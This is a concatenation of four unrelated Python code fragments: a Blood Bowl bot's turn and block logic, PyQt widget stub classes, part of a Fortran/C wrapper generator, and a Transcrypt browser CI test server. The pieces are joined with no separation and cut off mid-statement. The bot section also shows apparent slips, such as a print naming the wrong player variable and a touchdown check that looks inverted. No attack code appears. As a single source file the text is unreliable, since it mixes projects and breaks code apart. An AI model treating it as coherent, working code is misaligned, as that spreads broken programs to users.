self.actions.append(Action(ActionType.MOVE, position=step)) print(f"Move receiver {player.role.name}") return print("6. Blitz with open block players") if game.is_blitz_available(): best_blitz_attacker = None best_blitz_defender = None best_blitz_score = None best_blitz_path = None for blitzer in open_players: if blitzer.position is not None and not blitzer.state.used and blitzer.has_skill(Skill.BLOCK): blitz_paths = pf.get_all_paths(game, blitzer, blitz=True) for path in blitz_paths: final_position = path.steps[-1] if len(path) > 0 else blitzer.position for defender in game.get_adjacent_players(final_position, team=game.get_opp_team(blitzer.team)): p_self, p_opp, p_fumble_self, p_fumble_opp = game.get_blitz_probs(blitzer, final_position, defender) p_self_up = path.prob * (1-p_self) p_opp = path.prob * p_opp p_fumble_opp = p_fumble_opp * path.prob if blitzer == game.get_ball_carrier(): p_fumble_self = path.prob + (1 - path.prob) * p_fumble_self score = p_self_up + p_opp + p_fumble_opp - p_fumble_self if best_blitz_score is None or score > best_blitz_score: best_blitz_attacker = blitzer best_blitz_defender = defender best_blitz_score = score best_blitz_path = path if best_blitz_attacker is not None and best_blitz_score >= 1.25: self.actions.append(Action(ActionType.START_BLITZ, player=best_blitz_attacker)) if not best_blitz_attacker.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in best_blitz_path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) self.actions.append(Action(ActionType.BLOCK, position=best_blitz_defender.position)) print(f"Blitz with {best_blitz_attacker.role.name}, score={best_blitz_score}") return print("7. Make cage around ball carrier") cage_positions = [ Square(game.get_ball_position().x - 1, game.get_ball_position().y - 1), Square(game.get_ball_position().x + 1, game.get_ball_position().y - 1), Square(game.get_ball_position().x - 1, game.get_ball_position().y + 1), Square(game.get_ball_position().x + 1, game.get_ball_position().y + 1) ] if ball_carrier is not None: for cage_position in cage_positions: if game.get_player_at(cage_position) is None and not game.is_out_of_bounds(cage_position): for player in open_players: if player == ball_carrier or player.position in cage_positions: continue if player.position.distance(cage_position) > player.num_moves_left(): continue if game.num_tackle_zones_in(player) > 0: continue path = pf.get_safest_path(game, player, cage_position) if path is not None and path.prob > 0.94: self.actions.append(Action(ActionType.START_MOVE, player=player)) if not player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) print(f"Make cage around towards ball carrier {player.role.name}") return # Scan for assist positions assist_positions = [] for player in game.get_opp_team(self.my_team).players: if player.position is None or not player.state.up: continue opponents = game.get_adjacent_opponents(player, down=False) for opponent in opponents: att_str, def_str = game.get_block_strengths(player, opponent) if def_str >= att_str: for open_position in game.get_adjacent_squares(player.position, occupied=False): if len(game.get_adjacent_players(open_position, team=self.opp_team, down=False)) == 1: assist_positions.append(open_position) print("8. Move non-marked players to assist") for player in open_players: for assist_position in assist_positions: path = pf.get_safest_path(game, player, assist_position) if path is not None and path.prob == 1: self.actions.append(Action(ActionType.START_MOVE, player=player)) if not player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) print(f"Move assister {player.role.name} to {assist_position.to_json}") return print("9. Move towards the ball") for player in open_players: if player == ball_carrier: continue if game.num_tackle_zones_in(player) > 0: continue if ball_carrier is None: path = pf.get_safest_path(game, player, game.get_ball_position()) elif ball_carrier.team != self.my_team: path = pf.get_safest_path_to_player(game, player, ball_carrier) else: continue if path is not None: steps = [] for step in path.steps: if len(steps) >= player.get_ma() + (3 if not player.state.up else 0): break if ball_carrier is not None and ball_carrier.team == self.my_team and step in game.get_adjacent_squares(ball_carrier.position): break steps.append(step) if game.num_tackle_zones_at(player, step) > 0: break if len(steps) > 0: self.actions.append(Action(ActionType.START_MOVE, player=player)) if not player.state.up: self.actions.append(Action(ActionType.STAND_UP)) for step in steps: self.actions.append(Action(ActionType.MOVE, position=step)) print(f"Move towards ball {player.role.name}") return print("10. Risky blocks") attacker, defender, p_self_up, p_opp_down, block_p_fumble_self, block_p_fumble_opp = self._get_safest_block(game) if attacker is not None and (p_opp_down > (1-p_self_up) or block_p_fumble_opp > 0): self.actions.append(Action(ActionType.START_BLOCK, player=attacker)) self.actions.append(Action(ActionType.BLOCK, position=defender.position)) print(f"Block with {player.role.name} -> {defender.role.name}, p_self_up={p_self_up}, p_opp_down={p_opp_down}") return print("11. End turn") self.actions.append(Action(ActionType.END_TURN)) def _get_safest_block(self, game): block_attacker = None block_defender = None block_p_self_up = None block_p_opp_down = None block_p_fumble_self = None block_p_fumble_opp = None for attacker in self.my_team.players: if attacker.position is not None and not attacker.state.used and attacker.state.up: for defender in game.get_adjacent_opponents(attacker, down=False): p_self, p_opp, p_fumble_self, p_fumble_opp = game.get_block_probs(attacker, defender) p_self_up = (1-p_self) if block_p_self_up is None or (p_self_up > block_p_self_up and p_opp >= p_fumble_self): block_p_self_up = p_self_up block_p_opp_down = p_opp block_attacker = attacker block_defender = defender block_p_fumble_self = p_fumble_self block_p_fumble_opp = p_fumble_opp return block_attacker, block_defender, block_p_self_up, block_p_opp_down, block_p_fumble_self, block_p_fumble_opp def quick_snap(self, game): return Action(ActionType.END_TURN) def blitz(self, game): return Action(ActionType.END_TURN) def player_action(self, game): # Execute planned actions if any if len(self.actions) > 0: action = self._get_next_action() return action ball_carrier = game.get_ball_carrier() if ball_carrier == game.get_active_player(): td_path = pf.get_safest_path_to_endzone(game, ball_carrier) if td_path is not None and td_path.prob <= 0.9: self.actions.append(Action(ActionType.START_MOVE, player=ball_carrier)) for step in td_path.steps: self.actions.append(Action(ActionType.MOVE, position=step)) #print(f"Scoring with {ball_carrier.role.name}, p={td_path.prob}") return return Action(ActionType.END_PLAYER_TURN) def block(self, game): """ Select block die or reroll. """ # Get attacker and defender attacker = game.get_procedure().attacker defender = game.get_procedure().defender is_blitz = game.get_procedure().blitz dice = game.num_block_dice(attacker, defender, blitz=is_blitz) # Loop through available dice results actions = set() for action_choice in game.state.available_actions: actions.add(action_choice.action_type) # 1. DEFENDER DOWN if ActionType.SELECT_DEFENDER_DOWN in actions: return Action(ActionType.SELECT_DEFENDER_DOWN) if ActionType.SELECT_DEFENDER_STUMBLES in actions and not (defender.has_skill(Skill.DODGE) and not attacker.has_skill(Skill.TACKLE)): return Action(ActionType.SELECT_DEFENDER_STUMBLES) if ActionType.SELECT_BOTH_DOWN in actions and not defender.has_skill(Skill.BLOCK) and attacker.has_skill(Skill.BLOCK): return Action(ActionType.SELECT_BOTH_DOWN) # 2. BOTH DOWN if opponent carries the ball and doesn't have block if ActionType.SELECT_BOTH_DOWN in actions and game.get_ball_carrier() == defender and not defender.has_skill(Skill.BLOCK): return Action(ActionType.SELECT_BOTH_DOWN) # 3. USE REROLL if defender carries the ball if ActionType.USE_REROLL in actions and game.get_ball_carrier() == defender: return Action(ActionType.USE_REROLL) # 4. PUSH if ActionType.SELECT_DEFENDER_STUMBLES in actions: return Action(ActionType.SELECT_DEFENDER_STUMBLES) if ActionType.SELECT_PUSH in actions: return Action(ActionType.SELECT_PUSH) # 5. BOTH DOWN if ActionType.SELECT_BOTH_DOWN in actions: return Action(ActionType.SELECT_BOTH_DOWN) # 6. USE REROLL to avoid attacker down unless a one-die block if ActionType.USE_REROLL in actions and dice > 1: return Action(ActionType.USE_REROLL) # 7. ATTACKER DOWN if ActionType.SELECT_ATTACKER_DOWN in actions: return Action(ActionType.SELECT_ATTACKER_DOWN) def push(self, game): """ Select square to push to. """ # Loop through available squares for position in game.state.available_actions[0].positions: return Action(ActionType.PUSH, position=position) def follow_up(self, game): """ Follow up or not. ActionType.FOLLOW_UP must be used together with a position. """ player = game.state.active_player for position in game.state.available_actions[0].positions: # Always follow up if player.position != position: return Action(ActionType.FOLLOW_UP, position=position) def apothecary(self, game): """ Use apothecary? """ return Action(ActionType.USE_APOTHECARY) # return Action(ActionType.DONT_USE_APOTHECARY) def interception(self, game): """ Select interceptor. """ for action in game.state.available_actions: if action.action_type == ActionType.SELECT_PLAYER: for player, agi_rolls in zip(action.players, action.agi_rolls): return Action(ActionType.SELECT_PLAYER, player=player) return Action(ActionType.SELECT_NONE) def pass_action(self, game): """ Reroll or not. """ return Action(ActionType.USE_REROLL) # return Action(ActionType.DONT_USE_REROLL) def catch(self, game): """ Reroll or not. """ return Action(ActionType.USE_REROLL) # return Action(ActionType.DONT_USE_REROLL) def gfi(self, game): """ Reroll or not. """ return Action(ActionType.USE_REROLL) # return Action(ActionType.DONT_USE_REROLL) def dodge(self, game): """ Reroll or not. """
**kwargs): pass def count(*args, **kwargs): pass def dump(*args, **kwargs): pass def insertItem(*args, **kwargs): pass def insertStretch(*args, **kwargs): pass def invalidate(*args, **kwargs): pass def itemAt(*args, **kwargs): pass def itemSpacing(*args, **kwargs): pass def orientation(*args, **kwargs): pass def removeAt(*args, **kwargs): pass def removeItem(*args, **kwargs): pass def setAlignment(*args, **kwargs): pass def setGeometry(*args, **kwargs): pass def setItemSpacing(*args, **kwargs): pass def setOrientation(*args, **kwargs): pass def setSpacing(*args, **kwargs): pass def setStretchFactor(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def spacing(*args, **kwargs): pass def stretchFactor(*args, **kwargs): pass __new__ = None class QStackedLayout(QLayout): def __init__(*args, **kwargs): """ x.__init__(...) initializes x; see help(type(x)) for signature """ pass def addItem(*args, **kwargs): pass def addWidget(*args, **kwargs): pass def count(*args, **kwargs): pass def currentIndex(*args, **kwargs): pass def currentWidget(*args, **kwargs): pass def hasHeightForWidth(*args, **kwargs): pass def heightForWidth(*args, **kwargs): pass def insertWidget(*args, **kwargs): pass def itemAt(*args, **kwargs): pass def minimumSize(*args, **kwargs): pass def setCurrentIndex(*args, **kwargs): pass def setCurrentWidget(*args, **kwargs): pass def setGeometry(*args, **kwargs): pass def setStackingMode(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def stackingMode(*args, **kwargs): pass def takeAt(*args, **kwargs): pass def widget(*args, **kwargs): pass StackAll = None StackOne = None StackingMode = None __new__ = None currentChanged = None staticMetaObject = None widgetRemoved = None class QColorDialog(QDialog): def __init__(*args, **kwargs): """ x.__init__(...) initializes x; see help(type(x)) for signature """ pass def changeEvent(*args, **kwargs): pass def currentColor(*args, **kwargs): pass def done(*args, **kwargs): pass def open(*args, **kwargs): pass def options(*args, **kwargs): pass def selectedColor(*args, **kwargs): pass def setCurrentColor(*args, **kwargs): pass def setOption(*args, **kwargs): pass def setOptions(*args, **kwargs): pass def setVisible(*args, **kwargs): pass def testOption(*args, **kwargs): pass def customColor(*args, **kwargs): pass def customCount(*args, **kwargs): pass def getColor(*args, **kwargs): pass def setCustomColor(*args, **kwargs): pass def setStandardColor(*args, **kwargs): pass def standardColor(*args, **kwargs): pass ColorDialogOption = None ColorDialogOptions = None DontUseNativeDialog = None NoButtons = None ShowAlphaChannel = None __new__ = None colorSelected = None currentColorChanged = None staticMetaObject = None class QGraphicsAnchorLayout(QGraphicsLayout): def __init__(*args, **kwargs): """ x.__init__(...) initializes x; see help(type(x)) for signature """ pass def addAnchor(*args, **kwargs): pass def addAnchors(*args, **kwargs): pass def addCornerAnchors(*args, **kwargs): pass def anchor(*args, **kwargs): pass def count(*args, **kwargs): pass def horizontalSpacing(*args, **kwargs): pass def invalidate(*args, **kwargs): pass def itemAt(*args, **kwargs): pass def removeAt(*args, **kwargs): pass def setGeometry(*args, **kwargs): pass def setHorizontalSpacing(*args, **kwargs): pass def setSpacing(*args, **kwargs): pass def setVerticalSpacing(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def verticalSpacing(*args, **kwargs): pass __new__ = None class QLabel(QFrame): def __init__(*args, **kwargs): """ x.__init__(...) initializes x; see help(type(x)) for signature """ pass def alignment(*args, **kwargs): pass def buddy(*args, **kwargs): pass def changeEvent(*args, **kwargs): pass def clear(*args, **kwargs): pass def contextMenuEvent(*args, **kwargs): pass def event(*args, **kwargs): pass def focusInEvent(*args, **kwargs): pass def focusNextPrevChild(*args, **kwargs): pass def focusOutEvent(*args, **kwargs): pass def hasScaledContents(*args, **kwargs): pass def hasSelectedText(*args, **kwargs): pass def heightForWidth(*args, **kwargs): pass def indent(*args, **kwargs): pass def keyPressEvent(*args, **kwargs): pass def margin(*args, **kwargs): pass def minimumSizeHint(*args, **kwargs): pass def mouseMoveEvent(*args, **kwargs): pass def mousePressEvent(*args, **kwargs): pass def mouseReleaseEvent(*args, **kwargs): pass def movie(*args, **kwargs): pass def openExternalLinks(*args, **kwargs): pass def paintEvent(*args, **kwargs): pass def picture(*args, **kwargs): pass def pixmap(*args, **kwargs): pass def selectedText(*args, **kwargs): pass def selectionStart(*args, **kwargs): pass def setAlignment(*args, **kwargs): pass def setBuddy(*args, **kwargs): pass def setIndent(*args, **kwargs): pass def setMargin(*args, **kwargs): pass def setMovie(*args, **kwargs): pass def setNum(*args, **kwargs): pass def setOpenExternalLinks(*args, **kwargs): pass def setPicture(*args, **kwargs): pass def setPixmap(*args, **kwargs): pass def setScaledContents(*args, **kwargs): pass def setSelection(*args, **kwargs): pass def setText(*args, **kwargs): pass def setTextFormat(*args, **kwargs): pass def setTextInteractionFlags(*args, **kwargs): pass def setWordWrap(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def text(*args, **kwargs): pass def textFormat(*args, **kwargs): pass def textInteractionFlags(*args, **kwargs): pass def wordWrap(*args, **kwargs): pass __new__ = None linkActivated = None linkHovered = None staticMetaObject = None class QFormLayout(QLayout): def __init__(*args, **kwargs): """ x.__init__(...) initializes x; see help(type(x)) for signature """ pass def addItem(*args, **kwargs): pass def addRow(*args, **kwargs): pass def count(*args, **kwargs): pass def expandingDirections(*args, **kwargs): pass def fieldGrowthPolicy(*args, **kwargs): pass def formAlignment(*args, **kwargs): pass def getItemPosition(*args, **kwargs): pass def getLayoutPosition(*args, **kwargs): pass def getWidgetPosition(*args, **kwargs): pass def hasHeightForWidth(*args, **kwargs): pass def heightForWidth(*args, **kwargs): pass def horizontalSpacing(*args, **kwargs): pass def insertRow(*args, **kwargs): pass def invalidate(*args, **kwargs): pass def itemAt(*args, **kwargs): pass def labelAlignment(*args, **kwargs): pass def labelForField(*args, **kwargs): pass def minimumSize(*args, **kwargs): pass def rowCount(*args, **kwargs): pass def rowWrapPolicy(*args, **kwargs): pass def setFieldGrowthPolicy(*args, **kwargs): pass def setFormAlignment(*args, **kwargs): pass def setGeometry(*args, **kwargs): pass def setHorizontalSpacing(*args, **kwargs): pass def setItem(*args, **kwargs): pass def setLabelAlignment(*args, **kwargs): pass def setLayout(*args, **kwargs): pass def setRowWrapPolicy(*args, **kwargs): pass def setSpacing(*args, **kwargs): pass def setVerticalSpacing(*args, **kwargs): pass def setWidget(*args, **kwargs): pass def sizeHint(*args, **kwargs): pass def spacing(*args, **kwargs): pass def takeAt(*args, **kwargs): pass def verticalSpacing(*args, **kwargs): pass AllNonFixedFieldsGrow = None DontWrapRows = None ExpandingFieldsGrow = None FieldGrowthPolicy = None FieldRole = None FieldsStayAtSizeHint = None ItemRole = None LabelRole = None RowWrapPolicy = None SpanningRole = None WrapAllRows = None WrapLongRows = None __new__ = None staticMetaObject = None class QToolBox(QFrame): def __init__(*args, **kwargs): """ x.__init__(...) initializes x; see help(type(x)) for signature """ pass def addItem(*args, **kwargs): pass def changeEvent(*args, **kwargs): pass def count(*args, **kwargs): pass def currentIndex(*args, **kwargs): pass def currentWidget(*args, **kwargs): pass def event(*args, **kwargs): pass def indexOf(*args, **kwargs): pass def insertItem(*args, **kwargs): pass def isItemEnabled(*args, **kwargs): pass def itemIcon(*args, **kwargs): pass def itemInserted(*args, **kwargs): pass def itemRemoved(*args, **kwargs): pass def itemText(*args, **kwargs): pass def itemToolTip(*args, **kwargs): pass def removeItem(*args, **kwargs): pass def setCurrentIndex(*args, **kwargs): pass def setCurrentWidget(*args, **kwargs): pass def setItemEnabled(*args, **kwargs): pass
result of old_node. old_node : FunctionNode Original function (wrap fortran). new_node : FunctionNode New function (wrap c) that passes arg. """ attrs = arg.attrs meta = arg.metaattrs c_attrs = new_node.ast.attrs f_attrs = old_node.ast.attrs if f_attrs["deref"] is None: f_attrs["deref"] = "allocatable" attrs["deref"] = "allocatable" old_node.ast.metaattrs["deref"] = "allocatable" meta["deref"] = "allocatable" for name in ["owner", "free_pattern"]: if c_attrs[name]: attrs[name] = c_attrs[name] del c_attrs[name] def result_as_arg(self, node, C_new): """ Create a Fortran function for a C function which has the result added as an argument. Create Fortran function without bufferify function_suffix but with len attributes on string arguments. char *out(); -> call out(result_as_arg) """ F_new = C_new.clone() # Fortran function should wrap the new C function F_new._PTR_F_C_index = C_new._function_index F_new.wrap.assign(fortran=True) # Do not add '_bufferify' F_new.fmtdict.function_suffix = node.fmtdict.function_suffix # Do not wrap original function (does not have result argument) node.wrap.fortran = False return F_new def process_return_this(self, node, ordered_functions): """Deal with return_this feature. If a function is marked return_this, convert it into a subroutine for the C and Fortran wrappers. Return this allows chaining of function calls. For example in C++: obj->doA()->doB(); Python: obj.doA().doB() However, there is no way to chain in C or Fortran. Clone the function and wrap for C and Fortran. Turn off C and Fortran wrapper on original node. Remove the function result. Parameters ---------- node : FunctionNode ordered_functions : list of FunctionNode """ if node.wrap.c == False and node.wrap.fortran == False: return new = node.clone() ordered_functions.append(new) self.append_function_index(new) new._generated = "return_this" # Only wrap for C and Fortran, transfer values from node. new.wrap.clear() new.wrap.c = node.wrap.c new.wrap.fortran = node.wrap.fortran node.wrap.c = False node.wrap.fortran = False # Do not return C++ this instance. new.ast.set_return_to_void() def arg_to_CFI(self, node, ordered_functions): """Look for functions which can use TS29113 Futher interoperability with C. If a function requires CFI_cdesc, clone the function and set arg.stmts_suffix to "cfi" to use the correct statements. The new function will be called by Fortran directly via the bind(C) interface. The original function no longer needs to be wrapped by Fortran; however, it will still be wrapped by C to provide a C API to a C++ function. Parameters ---------- node : FunctionNode ordered_functions : list of FunctionNode """ options = node.options fmt_func = node.fmtdict if options.wrap_fortran is False: # The buffer function is intended to be called by Fortran. # No Fortran, no need for buffer function. return ast = node.ast result_typemap = ast.typemap # shadow classes have not been added yet. # Only care about string, vector here. result_is_ptr = ast.is_indirect() if ( result_typemap and result_typemap.base in ["string", "vector"] and result_typemap.name != "char" and not result_is_ptr ): node.wrap.c = False # node.wrap.fortran = False self.config.log.write( "Skipping {}, unable to create C wrapper " "for function returning {} instance" " (must return a pointer or reference)." " Bufferify version will still be created.\n".format( result_typemap.cxx_type, ast.name ) ) ast = node.ast cfi_args = {} for arg in ast.params: cfi_args[arg.name] = False arg_typemap = arg.typemap if arg.metaattrs["assumed-rank"]: cfi_args[arg.name] = True elif arg_typemap.sgroup == "string": cfi_args[arg.name] = True elif arg_typemap.sgroup == "char": if arg.is_indirect(): cfi_args[arg.name] = True has_cfi_arg = any(cfi_args.values()) # Function result. has_string_result = False result_as_arg = "" # Only applies to string functions # when the result is added as an argument to the Fortran api. # Check if result needs to be an argument. attrs = ast.attrs if attrs["deref"] == "raw": # No bufferify required for raw pointer result. pass elif result_typemap.sgroup in ["char", "string"]: has_string_result = True result_as_arg = fmt_func.F_string_result_as_arg result_name = result_as_arg or fmt_func.C_string_result_as_arg if not (has_cfi_arg or has_string_result): return False options.wrap_fortran = False # Create a new C function and change arguments # and add attributes. C_new = node.clone() ordered_functions.append(C_new) self.append_function_index(C_new) generated_suffix = "cfi" C_new._generated = "arg_to_cfi" C_new.generated_suffix = generated_suffix # used to lookup fc_statements fmt_func = C_new.fmtdict fmt_func.function_suffix = fmt_func.function_suffix + fmt_func.C_cfi_suffix C_new.wrap.assign(c=True)#, fortran=True) C_new._PTR_C_CXX_index = node._function_index for arg in C_new.ast.params: attrs = arg.attrs arg_typemap = arg.typemap if cfi_args[arg.name]: arg.stmts_suffix = generated_suffix if arg_typemap.sgroup in ["char", "string"]: # Create local variable names to be used in statements. # TODO: move into metaattrs attrs["len"] = True attrs["len_trim"] = True ast = C_new.ast if has_string_result: f_attrs = node.ast.attrs # Fortran function attributes f_meta = node.ast.metaattrs # Fortran function attributes if ast.attrs["len"] or result_as_arg: # decl: const char * getCharPtr2() +len(30) # +len implies copying into users buffer. result_as_string = ast.result_as_arg(result_name) result_as_string.const = False # must be writeable attrs = result_as_string.attrs # attrs["len"] = options.C_var_len_template.format( # c_var=result_name # ) # Special case for wrapf.py to override "allocatable" f_attrs["deref"] = "result-as-arg" f_meta["deref"] = "result-as-arg" elif (result_typemap.sgroup == "string" or result_is_ptr): # 'char *' result_as_string = ast.result_as_arg(result_name) attrs = result_as_string.attrs self.move_arg_attributes(result_as_string, node, C_new) else: # char result_as_string = ast.result_as_arg(result_name) result_as_string.const = False # must be writeable attrs = result_as_string.attrs result_as_string.metaattrs["is_result"] = True C_new.ast.metaattrs["intent"] = None if result_as_arg: F_new = self.result_as_arg(node, C_new) ordered_functions.append(F_new) self.append_function_index(F_new) else: # Fortran function may call C subroutine if string/vector result # Fortran function calls bufferify function. node._PTR_F_C_index = C_new._function_index return True def arg_to_buffer(self, node, ordered_functions): """Look for function which have buffer arguments. This includes functions with string or vector arguments. If found then create a new C function that will add arguments buf_args (typically a buffer and length). String arguments added deref(allocatable) by default so that char * function will create an allocatable string in Fortran. Parameters ---------- node : FunctionNode ordered_functions : list of FunctionNode """ options = node.options fmt_func = node.fmtdict if node.wrap.c is False: # The user does not require a C wrapper. # This can be the case if the Fortran wrapper is doing all # the work via splicer or fstatements. return # If a C++ function returns a std::string instance, # the default wrapper will not compile since the wrapper # will be declared as char. It will also want to return the # c_str of a stack variable. Warn and turn off the wrapper. ast = node.ast result_typemap = ast.typemap # shadow classes have not been added yet. # Only care about string, vector here. result_is_ptr = ast.is_indirect() if ( result_typemap and result_typemap.base in ["string", "vector"] and result_typemap.name != "char" and not result_is_ptr ): node.wrap.c = False # node.wrap.fortran = False self.config.log.write( "Skipping {}, unable to create C wrapper " "for function returning {} instance" " (must return a pointer or reference)." " Bufferify version will still be created.\n".format( result_typemap.cxx_type, ast.name ) ) if node.wrap.fortran is False: # The buffer function is intended to be called by Fortran. # No Fortran, no need for buffer function. return if options.F_string_len_trim is False: # XXX what about vector? return # Arguments. # Is result or any argument a string or vector? # If so, additional arguments will be passed down so # create buffer version of function. has_buf_arg = False for arg in ast.params: arg_typemap = arg.typemap if arg_typemap.sgroup == "string": has_buf_arg = True elif arg_typemap.sgroup == "char": if arg.ftrim_char_in: pass elif arg.is_indirect(): has_buf_arg = True elif arg_typemap.sgroup == "vector": has_buf_arg = True elif (arg_typemap.sgroup == "native" and arg.metaattrs["intent"] == "out" and arg.get_indirect_stmt() in ["**", "*&"]): # arg.attrs["dimension"]: # double **values +intent(out) +dimension(nvalues) has_buf_arg = True # Function result. has_string_result = False has_vector_result = False need_cdesc_result = False result_as_arg = "" # Only applies to string functions # when the result is added as an argument to the Fortran api. # Check if result needs to be an argument. attrs = ast.attrs if attrs["deref"] == "raw": # No bufferify required for raw pointer result. pass elif result_typemap.sgroup in ["char", "string"]: has_string_result = True result_as_arg = fmt_func.F_string_result_as_arg result_name = result_as_arg or fmt_func.C_string_result_as_arg elif result_typemap.base == "vector": has_vector_result = True elif result_is_ptr: if attrs["deref"] in ["allocatable", "pointer"]: need_cdesc_result = True elif attrs["dimension"]: need_cdesc_result = True # Functions with these results need wrappers. if not (has_string_result or has_vector_result or need_cdesc_result or has_buf_arg): return
#!/usr/bin/env python3 """ Transcrypt CI testserver. Hit /index with a browser and you'll see what it does. In travis we hit it via `xvfb-run firefox \ http://127.0.0.1:8080/do/hello,time,transcrypt/dictionaries,...` This is to speed up CI testing: - phantomjs was no option, too much incompat with real browsers - starting firefox on each autotest.html files would have taken ages due to FF startup times (in headless CI envs) - so we keep FF open and redirect via js from test to test This can be easily made parallel by starting a few FFs and servers on different ports CAUTION: The full transcrypt/autotest.py does not run, so we allow to give seperate subfolders, for which we create then a ci.py autotest file and run that in the parent dir. ## Sequence of hits Call `/do/<tests>` via the browser and check the network log about the various requests. ## Tips 1. Search os.chdir in this module, we managed to run the tests only in their dirs. 1. `/chk/<test>` allows to analyse a single test, e.g. `/chk/transcrypt/dictionaries` 1. `/.fooo` is expanded to `/transcrypt/foo` as test name. """ import sys, os, time, subprocess, urllib, logging # make py2 >> py3: from imp import reload reload(sys) from bottle import route, run, template, request os.system ('python3.7 -m pip install mypy') # tests to run, filled in sys.argv: T = [] max_wait = 10 # then its error # single or multithreaded (latter required for dev mode, getting fs change # hits, while polling. Disadvantage: pip install paste required, not req. for travis: dev_mode = 0 test_end_marker = 'done' env, j, exists = os.environ, os.path.join, os.path.exists env['TZ'] = 'Europe/Berlin' # for browser and our transcypt -r stop_flag = '/tmp/transcrypt_tester_stopflag' ctx = {'cur_test': None, 'have_run': []} # set some paths into our environ: _ = os.path.abspath(__file__).rsplit # /root/Transcrypt/transcrypt: env['d_0'] = d0 = _('/', 3)[0] runners = {'3.5': 'run_transcrypt35', '3.6': 'run_transcrypt36', '3.7': 'run_transcrypt37'} avail_pyvers = [] for maj in '3.5', '3.6', '3.7': if os.popen('python%s --version 2>/dev/null' % maj).read(): avail_pyvers.append(maj) # /root/Transcrypt/transcrypt/development_cont.int: env['d_i'] = _('/', 1)[0] log_file = env['d_i'] + '/results.log' env['d_at'] = d0 + '/development/automated_tests' dflt_fs_mon = ('find "%s" -name "*.py" | entr -c ' 'wget -q "%%(FS_CHANGE_URL)s" -O -') % env['d_0'] env['TS_MON_CMD'] = os.environ.get('TS_MON_CMD', dflt_fs_mon) # test flag sets, comma seperated from env or CLI test_flags = ['-bnc__-da__-e__5', '-bnc__-da__-e__6'] html_tmpl = '''<html> <body> %s <script> %s </script> </body> </html>''' redir = html_tmpl % ('%s', 'window.location.href="%s";') def cd(): 'back to integration test dir' os.chdir('%(d_i)s' % env) @route('/chk/<test:path>') def chk(test): ''' a single test, intended for browser - stopping after running at the .html - test might contain flags (hello::-b -n -c -da -e 5). - if not we take the first flag set from test_flags ''' if not '::' in test: test += '::' + test_flags[0] test = unalias(test) reset_ctx() ctx['stop'] = 1 ctx['init_url'] = '/chk/%s' % test return index(tests=test, single=1) @route('/') @route('/do/<tests:path>') def index(tests=0, single=None): ''' we keep track of which test is run via the ctx structure and repeatadly call ourselves''' if 'favico' in str(tests): return '' if not tests and not T: # no args -> give info: return '<br>'.join(( 'Need a comma seped. list of tests to run, e.g. /do/hello,time', 'You can also call a single test like /chk/hello or /chk/.dictionaries')) cd() if not T: # first run if not single: reset_ctx() ctx['init_url'] = '/do/%s' % tests if os.path.exists('./%s' % tests): info(I('loading test set')) with open(tests) as fd: tests = fd.read() # ignoring '# ...' lines, using 'foo' in 'foo # comment' lines: tests = [k.split('#')[0].strip() for k in tests.splitlines() \ if k and not k.startswith('#')] else: # alternative form: tests = [k.strip() for k in tests.split(',')] _t = [] for t in tests: if '::' in t: _t.append(t) continue for flags in test_flags: _t.append(t + '::' + flags) tests = _t T.extend(tests) if exists(stop_flag): os.unlink(stop_flag) T.append(test_end_marker) t = ctx['cur_test'] # when we come again for the next test, this was the last we ran: last = ctx.get('cur_test') if last: ctx['have_run'].append(last) # next test: t = ctx['cur_test'] = T[0] if not t else T[T.index(t) + 1 ] t = unalias(t) if t == test_end_marker: ts = ['<a href="/chk/%s">%s</a>' % (k, k) \ for k in ctx.get('have_run', ())] testlist = '<ul><li>' + '</li><li>'.join(ts) + '</li></ul>' return stop('All tests finished:Success.', postfix=testlist) for s in ('', 'Next test', I('-' * 20), M(t), I('-' * 20)): info(s) return redir % ('', '/run_test/' + t) def unalias(t): if t.startswith('.'): # shortcut t = 'transcrypt/' + t[1:] return t def short(d): return d.replace(env['d_0'] + '/', '') def run_t(*args): 'invoke transcrypt with flags' args = ' '.join(args) args = args.replace('__', ' ') dbg_args = ' -v ' + args cmd = '%s %s' % (env['run_transcr'], args) dbg_cmd = '%s %s' % (env['run_transcr'], dbg_args) info('Invoking transcrypt: %s' % I(short(os.getcwd())), M(short(cmd))) if os.system(cmd): return os.popen(dbg_cmd + ' 2>&1').read() # %s e.g. dictionaries, we are in its parent dir when writing this: ci_at = ''' import org.transcrypt.autotester import %s autoTester = org.transcrypt.autotester.AutoTester () %s.run(autoTester) autoTester.done () ''' @route('/run_test/<filepath:path>') def run_test(filepath): ''' Called 3 times per test (filepath like <testdir>::<flags>) 1. filepath = the test and the flags -> cd to the test dir, returning redir to: 2. filepath = 'test_html' (compiling in the test dir -> autotest.html created, which we return) 3. filepath = '__javascript__/autotest.js' (fetching the js from within the html) the js is augemented with the result check and a redir to calling url, closing the loop ''' flags = ctx.get('cur_flags', '') if '::' in filepath: filepath, flags = filepath.split('::', 1) ctx['cur_flags'] = flags if '__javascript__' in filepath: with open(filepath) as fd: js = fd.read() if not ctx.get('stop'): # we are alraedy in d: js += ('\nlocation.href="/result?test=%s&flags=%s&res=" + ' 'document.getElementById("message").innerHTML;') % ( os.getcwd(), flags) else: js += ('\nhistory.pushState({}, null, "%(init_url)s");' % ctx) reset_ctx() js += '\n\n' # outputting the js - too much for travis: #splt = "var run = function (autoTester) {" #if splt in js: # debug(js.split(splt, 1)[1]) return js if not filepath.startswith('test_html'): # the compile takes long so we display a message, while we redir to # this method again: d = j(env['d_at'], filepath) os.chdir(d) return redir % ('compiling tests in %s... (using %s)' % (d, flags), '/run_test/test_html::' + flags) d = os.getcwd() env['PYTHONPATH'] = '.' fn = 'autotest' if not '%s.py' % fn in os.listdir(d): if not '__init__.py' in os.listdir(d): return redir % ('err', '/result?test=%s&flags=%s&res=ERROR' % ( d, flags)) print ((M('creating ci autotest.py file'))) fn = 'ci' d_was = d if fn == 'ci': d, test = d.rsplit('/', 1) os.chdir(d) with open(fn + '.py', 'w') as fd: fd.write(ci_at % (test, test)) err = None for _flags in ['-r %s' % flags, flags]: err = run_t(_flags, './%s.py' % fn) if err: break #env['PYTHONPATH'] = 